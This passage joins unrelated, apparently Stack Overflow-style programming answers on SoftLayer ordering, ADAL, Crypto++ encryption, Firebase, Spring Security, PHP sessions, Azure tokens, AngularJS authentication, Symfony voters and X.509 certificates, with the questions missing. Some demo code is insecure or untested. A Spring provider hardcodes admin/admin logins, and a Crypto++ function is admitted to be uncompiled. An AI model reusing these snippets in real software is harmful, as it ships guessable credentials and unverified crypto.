        {'id': 13945},  # CentOS 6.x - Minimal Install (64 bit)
        {'id': 55},     # Host Ping Monitoring
        {'id': 57},     # Email and Ticket Notifications
        {'id': 58},     # Automated Notification Response
        {'id': 420},    # Unlimited SSL VPN Users & 1 PPTP VPN User per account
        {'id': 418},    # Nessus Vulnerability Assessment & Reporting
        {'id': 20893}   # MongoDB Community Edition
    ]
}

try:
    # Replace verifyOrder with placeOrder to actually submit the order
    result = client['SoftLayer_Product_Order'].verifyOrder(order)
    pp(result)
except SoftLayer.SoftLayerAPIError as e:
    pp('Unable to verify/place order faultCode=%s, faultString=%s'
       % (e.faultCode, e.faultString))

You can review the following link for further information as well:

http://sldn.softlayer.com/blog/bpotter/Going-Further-SoftLayer-API-Python-Client-Part-3

UPDATE

An object mask would be the best way to retrieve additional object data, such as the item price ids of an instance already created. You can use this mask:

mask[billingItem[orderItem,children[orderItem]]]

Or this one, which is more granular:

mask[billingItem[id,orderItem[itemPriceId],children[id,orderItem[itemPriceId]]]]

In Python you could use these masks in this way:

"""
Get Virtual Guest and its item price ids.

Important manual pages:
https://sldn.softlayer.com/reference/services/SoftLayer_Virtual_Guest
https://sldn.softlayer.com/reference/services/SoftLayer_Virtual_Guest/getObject
https://sldn.softlayer.com/article/object-masks

License: http://sldn.softlayer.com/article/License
Author: SoftLayer Technologies, Inc. <[email protected]>
"""
import SoftLayer
from pprint import pprint as pp

USERNAME = 'set me'
API_KEY = 'set me'
virtualGuestId = 25129311

client = SoftLayer.Client(username=USERNAME, api_key=API_KEY)

objectMask = 'mask[billingItem[id,orderItem[itemPriceId],children[id,orderItem[itemPriceId]]]]'

try:
    result = client['SoftLayer_Virtual_Guest'].getObject(id=virtualGuestId, mask=objectMask)
    pp(result)
except SoftLayer.SoftLayerAPIError as e:
    pp('Unable to get virtual guest faultCode=%s, faultString=%s'
       % (e.faultCode, e.faultString))

Regarding the SSH keys, you just need to add this line to the order object of the above script (the one that orders a virtual guest with MongoDB):

'sshKeys': [{'sshKeyIds': [214147, 94206]}]
Try the following script:

import SoftLayer
import json
from pprint import pprint as pp

USERNAME = 'set me'
API_KEY = 'set me'

productOrder = {
    "quantity": 1,
    "location": 1441195,
    "packageId": 251,
    # "sshKeyIds": 248873,
    "hardware": [
        {
            "hostname": "db2oncloud-tshirt-plan-customer-#-letter-datacenter",
            "primaryNetworkComponent": {
                "networkVlan": {"id": 1351859}
            },
            "domain": "bluemix.net",
            "primaryBackendNetworkComponent": {
                "networkVlan": {"id": 1351879}
            }
        }
    ],
    "prices": [
        {"id": 50691, "description": "Dual Intel Xeon E5-2620 v3 (12 Cores, 2.40 GHz)"},
        {"id": 49437, "description": "128 GB RAM"},
        {"id": 49081, "description": "Red Hat Enterprise Linux 7.x (64 bit) (per-processor licensing)"},
        {"id": 35686, "description": "10 Gbps Redundant Public & Private Network Uplinks"},
        {"id": 34241, "description": "Host Ping and TCP Service Monitoring"},
        {"id": 34996, "description": "Automated Reboot from Monitoring"},
        {"id": 50359, "description": "500 GB Bandwidth"},
        {"id": 33483, "description": "Unlimited SSL VPN Users & 1 PPTP VPN User per account"},
        {"id": 141833, "description": "1.2 TB SSD (10 DWPD)"},  # Disk0
        {"id": 141833, "description": "1.2 TB SSD (10 DWPD)"},  # Disk1
        {"id": 141833, "description": "1.2 TB SSD (10 DWPD)"},  # Disk2
        {"id": 141833, "description": "1.2 TB SSD (10 DWPD)"},  # Disk3
        {"id": 141833, "description": "1.2 TB SSD (10 DWPD)"},  # Disk4
        {"id": 141833, "description": "1.2 TB SSD (10 DWPD)"},  # Disk5
        {"id": 50143, "description": "800 GB SSD (10 DWPD)"},   # Disk6
        {"id": 50143, "description": "800 GB SSD (10 DWPD)"},   # Disk7
        {"id": 141965, "description": "DISK_CONTROLLER_RAID_10"},
        {"id": 32500, "description": "Email and Ticket"},
        {"id": 35310, "description": "Nessus Vulnerability Assessment & Reporting"},
        {"id": 34807, "description": "1 IP Address"},
        {"id": 25014, "description": "Reboot / KVM over IP"}
    ],
    "sshKeys": [
        {"sshKeyIds": [248873]}
    ],
    "storageGroups": [
        {
            "arraySize": 100,
            "arrayTypeId": 5,  # RAID 10
            "hardDrives": [0, 1, 2, 3, 4, 5],
            "partitionTemplateId": 1,  # Linux Basic
            "partitions": [
                {"isGrow": True, "name": "/ssd_disk1", "size": 3501}
            ]
        },
        {
            "arraySize": 800,
            "arrayTypeId": 2,  # RAID 1
            "hardDrives": [6, 7],
            "partitions": [
                {"isGrow": True, "name": "/ssd_disk2", "size": 800}
            ]
        }
    ]
}

client = SoftLayer.Client(username=USERNAME, api_key=API_KEY)
order = client['Product_Order'].verifyOrder(productOrder)
pp(order)
The Active Directory Authentication Library (ADAL) for JavaScript helps you use Azure AD for handling authentication in your single-page applications. This library is optimized for working together with AngularJS. Based on my investigation, this issue is caused by handleWindowCallback: the response never enters the branch for

if ((requestInfo.requestType === this.REQUEST_TYPE.RENEW_TOKEN) && window.parent && (window.parent !== window))

since the library is not being used in an Angular environment. To integrate Azure AD with an MVC application, I suggest using the Active Directory Authentication Library, and you can refer to the code sample here.

Update

if (isCallback) {
    // x.handleWindowCallback();
    var requestInfo = x.getRequestInfo(window.location.hash);

    // Get the token for the provided resource; to get the id_token,
    // we need to pass the client id
    var token = x.getCachedToken("{clientId}");

    x.saveTokenFromHash(requestInfo);
} else {
    x.login();
}
You mention "within our corporate intranet". Depending on how the endpoints are secured, option 1 could be challenging. Angular runs in a web browser, so if those services are only accessible via VPN/intranet, the web app will only work if your computer is connected to that intranet (i.e., it won't work if you run it from home). Another security challenge with option 1 is that if the endpoints require special authentication "secrets" (API tokens, passwords, certificates, etc.), those secrets will be exposed and visible to anyone who uses the web app, since anyone can see the traffic between their browser and the server. With option 2, those secrets can stay hidden behind your middle layer. Lastly, even if Angular talks to those endpoints directly, you will still need to have the HTML/JS/CSS hosted on some web server. You may not need a full-blown application server, but you'll need something to point your web browser at. If those concerns don't apply to your case, then it's really up to you to pick whichever option you and your team are most comfortable with.
char* encrypt(char* plainText, ... );
char* decrypt(char* cipher, ... );

You can also avoid encryptString and decryptString and the extra copy. I'll show you encrypt; decrypt is similar.

char* encrypt(char* plainText, byte key[], int sizeKey,
              byte iv[], int sizeIV, long& len)
{
    const unsigned long plainTextLen = len;
    len = 0;

    const unsigned long extraLen = plainTextLen + 16;

    ArraySource source(plainText, plainTextLen, false);

    unique_ptr<char[]> writable(new char[extraLen]);
    ArraySink sink(writable, extraLen);

    CTR_Mode<AES>::Encryption enc;
    enc.SetKeyWithIV(key, sizeKey, iv, sizeIV);

    source.Detach(new StreamTransformationFilter(enc, new Redirector(sink)));
    source.PumpAll();

    len = sink.TotalPutLength();
    return writable.release();
}

I did not compile and run it, so you will have to clear the compiler issues in the code above. They should all be minor, like conversions and casts. You usually don't need to worry about the NULL; just use the ptr and len. You can create a std::string from the decrypted ciphertext with string recovered = string(ptr, len);. std::string will produce a NULL when needed, but it's usually not needed. Detach is not a typo: you use it to attach a new filter and delete the previous filter, which avoids memory leaks.
Firebase won't allow duplicate users (emails), so just look for an error when you try to create the user.

FIRAuth.auth()?.createUser(withEmail: email, password: password) { (user, error) in
    // ...
}

There are 4 errors that could be returned:

FIRAuthErrorCodeInvalidEmail: Indicates the email address is malformed.

FIRAuthErrorCodeEmailAlreadyInUse (this is the one that addresses your question): Indicates the email used to attempt sign up already exists. Call fetchProvidersForEmail to check which sign-in mechanisms that user used, and prompt the user to sign in with one of those.

FIRAuthErrorCodeOperationNotAllowed: Indicates that email and password accounts are not enabled. Enable them in the Authentication section of the Firebase console.

FIRAuthErrorCodeWeakPassword: Indicates an attempt to set a password that is considered too weak. The NSLocalizedFailureReasonErrorKey field in the NSError.userInfo dictionary will contain a more detailed explanation that can be shown to the user.
In "Authenticate with a backend server" you can see this warning:

"Do not accept plain user IDs, such as those you can get with the GoogleSignInAccount.getId() method, on your backend server. A modified client application can send arbitrary user IDs to your server to impersonate users, so you must instead use verifiable ID tokens to securely get the user IDs of signed-in users on the server side."

So if you want to authenticate the user with a backend, you'll need to call getIdToken() on Android, send the token to the server, and verify the received token on the server (this is where you need to check the client ID). Why is this important? In the same chapter you can read:

"The value of aud in the ID token is equal to one of your app's client IDs. This check is necessary to prevent ID tokens issued to a malicious app being used to access data about the same user on your app's backend server."

For authentication purposes you can use the client ID from the Android credentials. A web credential is required if you want server-side access to APIs on behalf of the user. In that case you'll need the web credential, because it additionally contains the clientSecret, which is necessary to exchange the received token for access and refresh tokens.
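On the server side, the aud check described above can be illustrated with plain Python. Note this sketch only decodes the token payload and checks the aud claim; real verification must also validate the token's signature, expiry, and issuer (e.g. with Google's official verification libraries). The client ID below is made up:

```python
import base64
import json

ANDROID_CLIENT_ID = "1234567890-abc.apps.googleusercontent.com"  # hypothetical

def decode_jwt_payload(id_token: str) -> dict:
    """Decode the (unverified) payload segment of a JWT."""
    payload_b64 = id_token.split(".")[1]
    # Restore the base64 padding that JWTs strip off.
    payload_b64 += "=" * (-len(payload_b64) % 4)
    return json.loads(base64.urlsafe_b64decode(payload_b64))

def aud_matches(id_token: str, allowed_client_ids) -> bool:
    """Check that the token was issued for one of *our* client IDs."""
    claims = decode_jwt_payload(id_token)
    return claims.get("aud") in allowed_client_ids
```

A token whose aud claim names some other application's client ID would be rejected here, which is exactly the impersonation scenario the documentation warns about.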
You've set yourself an impossible task. The problem is that by hardcoding the key into the program, as you've noted, the user can still get the key by reverse engineering. If you put it in a file somewhere, the program needs to be able to read it, and therefore the user can also access it in the same way. The fundamental problem you have is that the software needs to access the key, and for that, the key must be stored somewhere reachable by the user too. It can be within the binary or on the computer, but the binary can be analyzed and the filesystem can be inspected. Encrypting a file protects the key, but just recreates the same problem with the new key. This is also the very same problem that all DRM schemes face: they give users access to the full software but want to limit it in some ways, yet the user has everything on his computer needed to run the software. That's why it's always possible to pirate any desktop software, if enough effort is put towards it. You can only make it more difficult, by obfuscating the key. So what can you do? An alternative approach is to not have the user hold the DB credentials at all, or to make them useless for anything significant. I can think of two approaches here: Have the system communicate with a web service and never with the DB directly. This way, the user only knows the address of the server, and the WS can request any authentication as needed before going to the DB. The WS is then the only one to ever touch the DB. This is what all websites do in practice: the visitor never sees the DB, but interacts with it through the web server. Another option would be to give the user direct DB access, but with credentials that only give permission to call some stored procedures (or access views without sensitive data), and those in turn request some sort of authentication before proceeding. This way the DB credential is no longer that sensitive, as long as its permissions are kept to the bare minimum and privileged actions are properly validated before proceeding.
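The first approach (a web-service middle layer) can be sketched as follows. Every name, token, and the stubbed-out DB call are hypothetical; the point is only that the real DB credentials live exclusively in the service layer, which the desktop client never sees:

```python
import hmac

# These stay on the server; the desktop client never receives them.
DB_CREDENTIALS = {"user": "app_db", "password": "kept-on-the-server"}

# Hypothetical per-user API tokens issued by the service after login.
API_TOKENS = {"alice": "token-abc123"}

def handle_request(user: str, token: str, query: str) -> dict:
    """Web-service layer: authenticate the caller, then touch the DB on their behalf."""
    expected = API_TOKENS.get(user)
    if expected is None or not hmac.compare_digest(expected, token):
        return {"status": 401, "body": "authentication required"}
    # Only now does server-side code use the DB credentials (stubbed out here).
    return {"status": 200, "body": "ran %r as %s" % (query, DB_CREDENTIALS["user"])}
```

The client only ever holds its own revocable token, so reverse engineering the client yields nothing that grants direct database access.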
First, you generally shouldn't use the same certificate for both the web and mail servers. The basic setup is that the web server should have a cert for www.whatever.com with whatever.com as an alternate name (or maybe the reverse), and the mail server will have a cert for something like mail.whatever.com, or whatever its host name is. Note that the mail server's cert should be for its hostname, not the domain it serves for. It's entirely normal to have a mail server that isn't even under the same top-level domain as the domain it's serving for -- if there's an MX record in the DNS that says mail for whatever.com should go to someserver.isp.net, that's completely normal, and the mail server needs a cert for someserver.isp.net, not whatever.com. Second, it sounds like you're trying to over-automate this. If you did need the same cert on multiple computers, you should generally copy it manually between the servers (using e.g. scp between unprivileged accounts), and then install it manually on each server. On the other hand, if you're using an automated cert generation system like letsencrypt's, you're probably better off generating independent certs on each server. There's a significant security risk with allowing automated privilege escalation, like allowing rsync to run as root via sudo. Unless you're very careful, anyone with any access to the system could take advantage of this to e.g. modify any file they want (including /etc/sudoers) simply by doing it with rsync! Similarly, allowing one server to remote into another as root means anyone who can take over one server automatically gets full control of the other. This is dangerous! Don't do it unless you really need to, and in that case you need to really really understand exactly what you're doing.
Yes, the issue is with your ant matchers. As per my understanding, when you say anyRequest().permitAll(), it doesn't comply with antMatchers("/admin/*").access("hasRole('ROLE_ADMIN')"), because you're telling web security to allow every request to go through without authorization. Change it as below:

http.authorizeRequests()
    .antMatchers("/login").permitAll()
    .antMatchers("/admin/**").access("hasRole('ADMIN')")
    .and().formLogin().loginPage("/login")

https://github.com/satya-j/rab/blob/master/src/main/java/com/satya/rab/config/WebSecurityConfig.java - refer to this; it's my repo where I had earlier tried out Spring Security.

EDIT: Here is an update.

WebSecurityConfig

.antMatchers("/login").permitAll()
.antMatchers("/admin/**").access("hasRole('ADMIN')")
.antMatchers("/**").access("hasRole('USER')")
.and()
.formLogin().loginPage("/login")
.usernameParameter("username")
.passwordParameter("password")
.defaultSuccessUrl("/index")
.failureUrl("/login?error");

You can use an authentication provider of your choice to set roles based on the user.
CustomAuthenticationProvider

@Component("authProvider")
public class CustomAuthenticationProvider implements AuthenticationProvider {

    @Override
    public Authentication authenticate(Authentication auth) throws AuthenticationException {
        String username = auth.getName();
        String password = auth.getCredentials().toString();
        if (username.equals("user") && password.equals("user")) {
            List<GrantedAuthority> grantedAuths = new ArrayList<GrantedAuthority>();
            grantedAuths.add(new SimpleGrantedAuthority("ROLE_USER"));
            return new UsernamePasswordAuthenticationToken(username, password, grantedAuths);
        } else if (username.equals("admin") && password.equals("admin")) {
            List<GrantedAuthority> grantedAuths = new ArrayList<GrantedAuthority>();
            grantedAuths.add(new SimpleGrantedAuthority("ROLE_ADMIN"));
            grantedAuths.add(new SimpleGrantedAuthority("ROLE_USER"));
            return new UsernamePasswordAuthenticationToken(username, password, grantedAuths);
        } else {
            throw new CustomException("Unable to auth against third party systems");
        }
    }

    @Override
    public boolean supports(Class<?> auth) {
        return auth.equals(UsernamePasswordAuthenticationToken.class);
    }
}

I've used custom authentication. As I'm just playing with Spring Security, I didn't go for any database configuration; you can implement it in your own way. The above validates the auth credentials and sets the roles (authorities). As an admin should be able to view user modules as well (in most cases, at least that's my conception), I've attached both the user and admin authorities when an admin logs in. In simple words: 1. When a user logs in, he'll be able to access every /**, but not /admin/**. 2. When an admin logs in, he'll be able to access every /** and /admin/**. I've tested the scenarios, and you can go through the entire code here - https://github.com/satya-j/rab
To solve this issue, I created a new @ngrx/store action for refreshing my token and consume it using @ngrx/effects. I understand that not everyone will want to use effects, but I find them very useful in a number of scenarios, not just this one. So my REST get function now looks like this:

get(url: string): Observable<any> {
  return this.http.get(url, new RequestOptions({ headers: this.authHeader() }))
    .catch(err => {
      if (err.status === 401) {
        this.store.dispatch({ type: 'REFRESH TOKEN' });
      }
      return Observable.of(err);
    })
    .map((res: Response) => res.json());
}

This action is picked up by my effects module:

@Effect()
refreshToken$ = this.actions$
  .ofType('REFRESH TOKEN')
  .throttleTime(3000)
  .switchMap(() => this.authService.refreshLogin())
  .map((response) => {
    // Store token
  });

Meanwhile, the function/action/whatever that receives the response from the REST get request can determine whether the request was successful or whether it failed because of failed authentication. If it was the latter, it can fire off the request another time (after waiting for the renewed token); otherwise, it can deal with the other type of failure in a different way.
Okay, here is what I think you need. First, sessions that are accessible from all three domains. Here is something for that:

session_set_cookie_params(0, '/', '.your-domain.com');
session_start();

Now your session data will be shared across all your subdomains. Next (I am simplifying this step because I noticed you wrote cPanel), you need a common session path for all subdomains. That is already done, because by default PHP uses files to store session data. If you scale to multiple servers, make sure your session data is stored in some database server accessible to all of the subdomains. Now you need to differentiate which subdomain the user came from. For that, simply add a flag in the login system that writes the subdomain into the PHP session. Example:

<?php
if (user.login($username, $password)) {
    $_SESSION["authenticated"] = true;
    $_SESSION["authSource"] = $_SERVER['HTTP_HOST'];
}
?>

The method user.login is only representative, not an actual method; you can change it according to your code. So in conclusion: the first code segment will share session cookies across all subdomains of your domain, and the second part will set a flag in $_SESSION recording which subdomain the authentication occurred from.
I based most of my work on this post that laid some groundwork. You need to create a Native Application in your Azure AD first and add the Windows Azure Service Management API permission. The ClientId is obtained from this app. This is the code I'm currently using to obtain a token that can be used with the Management SDK:

string userName = "yourUserName";
string password = "yourPassword";
string directoryName = "yourDirectory.onmicrosoft.com";
string clientId = "{ClientId obtained by creating an App in the Active Directory}";

var credentials = new UserPasswordCredential(string.Format("{0}@{1}", userName, directoryName), password);
var authenticationContext = new AuthenticationContext("https://login.windows.net/" + directoryName);
var result = await authenticationContext.AcquireTokenAsync("https://management.core.windows.net/", clientId, credentials);
var jwtToken = result.AccessToken;

// Example: accessing the Azure CDN Management API
string subscriptionId = "xxxx-xxxxxx-xxxx-xxxxxxx";
using (var cdn = new CdnManagementClient(new TokenCredentials(jwtToken)) { SubscriptionId = subscriptionId })
{
    //do something...
}

Your directory name can be obtained in the Azure Portal > Azure AD section, under Domain names.
That is what a Service is for in Angular. Here is an example authentication service I am using in one of my applications. If you want to keep a user logged in after closing the application, you should also store the user in local storage.

app.factory('AuthService', ['$q', '$http', 'LocalStorageService', function($q, $http, LocalStorageService) {
    var service = {};

    service.user = LocalStorageService.get("AUTH_USER", null);

    service.isLoggedIn = function(){
        return service.user != null && service.user != undefined && service.user != "";
    }

    service.checkLogged = function(){
        return $http.get(APPCONFIG.apiAccessPoint + "/user/" + service.user._id + "/isLogged").then(function(response){
            if(!response.data.success || !response.data.logged){
                service.logout();
                return false;
            } else{
                return true;
            }
        }, function(response){
            service.logout();
            return false;
        });
    }

    service.login = function(name, password){
        return $http.post(APPCONFIG.apiAccessPoint + "/user/login", {name: name, password: password}).then(function (response){
            if(response.data.success){
                LocalStorageService.set('AUTH_USER', response.data.data);
                $http.defaults.headers.common.Authorization = 'Bearer ' + response.data.data.token;
                service.user = response.data.data;
            }
            return response.data;
        }, function (response){
            if(response.status == 400 || response.data.error_code == "VAL_ERROR"){
                return response.data;
            } else{
                return $q.reject();
            }
        });
    }

    service.logout = function(){
        // remove token from local storage and clear http auth header
        LocalStorageService.deleteValue("AUTH_USER");
        $http.defaults.headers.common.Authorization = '';
        service.user = null;
    }

    return service;
}]);

And this is how you would use the service in a controller (for example, showing a profile):

app.controller('ProfileViewCtrl', ['$scope', '$routeParams', 'AuthService', 'UserService', function($scope, $routeParams, AuthService, UserService) {
    $scope.isLogged = AuthService.isLoggedIn();
    $scope.user = null;
    $scope.notFound = false;
    $scope.ownProfile = false;

    $scope.user = UserService.getUser($routeParams.user).then(function(response){
        if(response.success){
            $scope.user = response.data;
            $scope.notFound = response.data == undefined;
            if(!$scope.notFound && $scope.isLogged){
                $scope.ownProfile = $scope.user._id == AuthService.user._id;
            }
        } else{
            console.log(response.data);
        }
    });
}]);

Or with the login page:

app.controller('LoginCtrl', ['$scope', '$route', 'AuthService', function($scope, $route, AuthService) {
    $scope.user = {};

    $scope.login = function(){
        AuthService.login($scope.user.name, $scope.user.password).then(function(response){
            if(response.success){
                $route.reload();
            } else{
                console.log("Wrong user or password...");
            }
        });
    }
}]);
Forgive my ignorance, but I've not come across a piece of software where the claims would be sent in cookies. Typically, the problem with cookies is the possibility of XSS (cross-site scripting) attacks, because browsers are written to always send them. What people tend to do these days is use a federated authentication mechanism, where the Identity Provider (login page) and the Service Provider (the app code) are not necessarily the same app and are not always directly connected. This means that the user data you could look up in the DB exists only in the IdP, and the SP has to deal with whatever the IdP provided. This is why each bit of information is sent in a "claim": the IdP claims that the username is john.smith, but the SP may not have any means of checking this. To make it work, the IdP and SP should have established some form of trust, typically in the form of pre-shared signing keys, which allows the IdP to sign the token (a SAML envelope or JWT, for example) and the SP to verify the signature and check that the token has not been tampered with. Typically, this token is never used as a cookie; instead it is added to an Authorization header, normally using the Bearer scheme. Also, as a side note: when you say you're familiar with using sessions, you have to understand that a session tracker is also a cookie (in ASP.NET). The server has information about a user stored in the app pool's memory cache, and the browser keeps sending the cookie saying "here I am". So security-wise there is a comparable level between simply using cookies and using cookies + session. Of course one could argue that a cookie could leak information, but an app could always tokenize the data or encrypt the whole cookie, negating this argument.
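The sign-and-verify trust relationship between IdP and SP can be sketched in a few lines of Python. This is a toy JWS-style construction with a made-up shared key and payload, not a real SAML or JWT implementation; it only shows how a pre-shared signing key lets the SP detect tampering:

```python
import base64
import hashlib
import hmac
import json

# Established between IdP and SP out of band (hypothetical value).
SHARED_KEY = b"pre-shared-signing-key"

def idp_issue_token(claims: dict) -> str:
    """IdP side: serialize the claims and append an HMAC signature."""
    body = base64.urlsafe_b64encode(json.dumps(claims).encode()).decode()
    sig = hmac.new(SHARED_KEY, body.encode(), hashlib.sha256).hexdigest()
    return body + "." + sig

def sp_verify_token(token: str):
    """SP side: recompute the HMAC; reject the token if it was tampered with."""
    body, sig = token.rsplit(".", 1)
    expected = hmac.new(SHARED_KEY, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, sig):
        return None  # tampered or signed with a different key
    return json.loads(base64.urlsafe_b64decode(body))
```

Real-world tokens carry more machinery (headers, expiry, issuer, audience, usually asymmetric signatures), but the core idea of trusting claims only after verifying a signature is the same.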
After several rounds of testing, I succeeded in reproducing your issue and got the same problem. To achieve your requirement, I made some modifications on the Android client end:

1. Cache the authenticated user in the MainActivity class. Following is my code snippet; for more details you can refer here.

public static final String SHAREDPREFFILE = "temp";
public static final String USERIDPREF = "uid";
public static final String TOKENPREF = "tkn";

@Override
protected void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
    setContentView(R.layout.activity_main);

    try {
        // Create the Mobile Service Client instance, using the provided Mobile Service URL and key
        mClient = new MobileServiceClient("https://yourwebsitename.azurewebsites.net", this)
                .withFilter(new ProgressFilter());

        // Extend timeout from default of 10s to 20s
        mClient.setAndroidHttpClientFactory(new OkHttpClientFactory() {
            @Override
            public OkHttpClient createOkHttpClient() {
                OkHttpClient client = new OkHttpClient();
                client.setReadTimeout(20, TimeUnit.SECONDS);
                client.setWriteTimeout(20, TimeUnit.SECONDS);
                return client;
            }
        });

        authenticate();
    } catch (MalformedURLException e) {
        createAndShowDialog(new Exception("There was an error creating the Mobile Service. Verify the URL"), "Error");
    } catch (Exception e) {
        createAndShowDialog(e, "Error");
    }
}

private void authenticate() {
    // We first try to load a token cache if one exists.
    if (loadUserTokenCache(mClient)) {
        createTable();
        register();
    }
    // If we failed to load a token cache, login and create a token cache
    else {
        // Login using the Google provider.
        ListenableFuture<MobileServiceUser> mLogin = mClient.login(MobileServiceAuthenticationProvider.Google);
        Futures.addCallback(mLogin, new FutureCallback<MobileServiceUser>() {
            @Override
            public void onFailure(Throwable exc) {
                createAndShowDialog("You must log in. Login Required", "Error");
            }

            @Override
            public void onSuccess(MobileServiceUser user) {
                createAndShowDialog(String.format("You are now logged in - %1$2s", user.getUserId()), "Success");
                cacheUserToken(mClient.getCurrentUser());
                createTable();
                register();
            }
        });
    }
}

private void cacheUserToken(MobileServiceUser user) {
    SharedPreferences prefs = getSharedPreferences(SHAREDPREFFILE, Context.MODE_PRIVATE);
    Editor editor = prefs.edit();
    editor.putString(USERIDPREF, user.getUserId());
    editor.putString(TOKENPREF, user.getAuthenticationToken());
    editor.commit();
}

private void register() {
    NotificationsManager.handleNotifications(this, NotificationSettings.SenderId, MyHandler.class);
    registerWithNotificationHubs();
}

2. In the RegistrationIntentService class, replace regID = hub.register(FCM_token).getRegistrationId(); with the following code:

regID = hub.register(FCM_token, prefs.getString("uid", "")).getRegistrationId();

3. Make sure to add the line below as the first line within the onHandleIntent method:

SharedPreferences prefs = getSharedPreferences("temp", Context.MODE_PRIVATE);
You can define a custom user permission voter for your User entity; see here.

namespace AppBundle\Security;

use AppBundle\Entity\User;
use Symfony\Component\Security\Core\Authentication\Token\TokenInterface;
use Symfony\Component\Security\Core\Authorization\Voter\Voter;
use Symfony\Component\Security\Core\Authorization\AccessDecisionManagerInterface;

class UserVoter extends Voter
{
    private $decisionManager;

    public function __construct(AccessDecisionManagerInterface $decisionManager)
    {
        $this->decisionManager = $decisionManager;
    }

    protected function supports($attribute, $subject)
    {
        // only vote on User objects inside this voter
        if (!$subject instanceof User) {
            return false;
        }

        return true;
    }

    protected function voteOnAttribute($attribute, $subject, TokenInterface $token)
    {
        // ROLE_SUPER_ADMIN can do anything! The power!
        if ($this->decisionManager->decide($token, array('ROLE_SUPER_ADMIN'))) {
            return true;
        }

        $user = $token->getUser();
        if (!$user instanceof User) {
            // the user must be logged in; if not, deny access
            return false;
        }

        /** @var User $targetUser */
        $targetUser = $subject;

        // Put your custom logic here
        switch ($attribute) {
            case "ROLE_SONATA_ADMIN_USER_VIEW":
                return true;
            case "ROLE_SONATA_ADMIN_USER_EDIT":
                return ($user === $targetUser);
        }

        return false;
    }
}

Then you create the service:

sonata_admin.user_voter:
    class: AppBundle\Security\UserVoter
    arguments: ['@security.access.decision_manager']
    public: false
    tags:
        - { name: security.voter }

Be careful with the access decision strategy: this may not work depending on your configuration, if it's set to unanimous or consensus. You may also add a direct link/route to the user's own edit page if you don't want to give every user access to the user list.
EDIT

To restrict user role edition, as you don't want users to edit their own roles, you can simply edit the configureFormFields function:

protected function configureFormFields(FormMapper $formMapper)
{
    $formMapper
        ->add('username')
        ->add('plainPassword', 'text', array(
            'required' => false,
        ))
        /* your other fields */
    ;

    if ($this->isGranted('ROLE_SUPER_ADMIN')) {
        $formMapper->add('roles', \Symfony\Component\Form\Extension\Core\Type\CollectionType::class, array(
            'entry_type' => \Symfony\Component\Form\Extension\Core\Type\ChoiceType::class,
            'entry_options' => array(
                'choices' => array(
                    "ROLE_OPTICKSB2B" => "ROLE_OPTICKSB2B",
                    "ROLE_ADMIN" => "ROLE_ADMIN",
                    "ROLE_SUPER_ADMIN" => "ROLE_SUPER_ADMIN"
                ),
            )
        ));
    }

    $formMapper
        ->add('isActive')
        ->add('title')
        ->add('firstname')
        ->add('lastname')
    ;
}

Obviously, the Symfony Forms component will check for you that no other fields are added.
How can I create an X509 certificate and specify different values for "issued to" and "issued by"? You can't. Self-signed means the Issuer's Distinguished Name is the same as the Subject's Distinguished Name. It also means the Authority Key Identifier (AKI) is the same as the Subject Key Identifier (SKI). Here's an example from a CA root, which is a self-signed certificate, too. There are a few differences between a CA root and a self-signed end-entity certificate; for example, a CA sets the Basic Constraints extension to CA:TRUE and marks it critical.

$ openssl x509 -in DigiCertHighAssuranceEVRootCA.pem -text -noout
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number:
            02:ac:5c:26:6a:0b:40:9b:8f:0b:79:f2:ae:46:25:77
    Signature Algorithm: sha1WithRSAEncryption
        Issuer: C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert High Assurance EV Root CA
        Validity
            Not Before: Nov 10 00:00:00 2006 GMT
            Not After : Nov 10 00:00:00 2031 GMT
        Subject: C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert High Assurance EV Root CA
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (2048 bit)
                Modulus:
                    00:c6:cc:e5:73:e6:fb:d4:bb:e5:2d:2d:32:a6:df:
                    e5:81:3f:c9:cd:25:49:b6:71:2a:c3:d5:94:34:67:
                    a2:0a:1c:b0:5f:69:a6:40:b1:c4:b7:b2:8f:d0:98:
                    a4:a9:41:59:3a:d3:dc:94:d6:3c:db:74:38:a4:4a:
                    cc:4d:25:82:f7:4a:a5:53:12:38:ee:f3:49:6d:71:
                    91:7e:63:b6:ab:a6:5f:c3:a4:84:f8:4f:62:51:be:
                    f8:c5:ec:db:38:92:e3:06:e5:08:91:0c:c4:28:41:
                    55:fb:cb:5a:89:15:7e:71:e8:35:bf:4d:72:09:3d:
                    be:3a:38:50:5b:77:31:1b:8d:b3:c7:24:45:9a:a7:
                    ac:6d:00:14:5a:04:b7:ba:13:eb:51:0a:98:41:41:
                    22:4e:65:61:87:81:41:50:a6:79:5c:89:de:19:4a:
                    57:d5:2e:e6:5d:1c:53:2c:7e:98:cd:1a:06:16:a4:
                    68:73:d0:34:04:13:5c:a1:71:d3:5a:7c:55:db:5e:
                    64:e1:37:87:30:56:04:e5:11:b4:29:80:12:f1:79:
                    39:88:a2:02:11:7c:27:66:b7:88:b7:78:f2:ca:0a:
                    a8:38:ab:0a:64:c2:bf:66:5d:95:84:c1:a1:25:1e:
                    87:5d:1a:50:0b:20:12:cc:41:bb:6e:0b:51:38:b8:
                    4b:cb
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Key Usage: critical
                Digital Signature, Certificate Sign, CRL Sign
            X509v3 Basic Constraints: critical
                CA:TRUE
            X509v3 Subject Key Identifier:
                B1:3E:C3:69:03:F8:BF:47:01:D4:98:26:1A:08:02:EF:63:64:2B:C3
            X509v3 Authority Key Identifier:
                keyid:B1:3E:C3:69:03:F8:BF:47:01:D4:98:26:1A:08:02:EF:63:64:2B:C3
    Signature Algorithm: sha1WithRSAEncryption
         1c:1a:06:97:dc:d7:9c:9f:3c:88:66:06:08:57:21:db:21:47:
         f8:2a:67:aa:bf:18:32:76:40:10:57:c1:8a:f3:7a:d9:11:65:
         8e:35:fa:9e:fc:45:b5:9e:d9:4c:31:4b:b8:91:e8:43:2c:8e:
         b3:78:ce:db:e3:53:79:71:d6:e5:21:94:01:da:55:87:9a:24:
         64:f6:8a:66:cc:de:9c:37:cd:a8:34:b1:69:9b:23:c8:9e:78:
         22:2b:70:43:e3:55:47:31:61:19:ef:58:c5:85:2f:4e:30:f6:
         a0:31:16:23:c8:e7:e2:65:16:33:cb:bf:1a:1b:a0:3d:f8:ca:
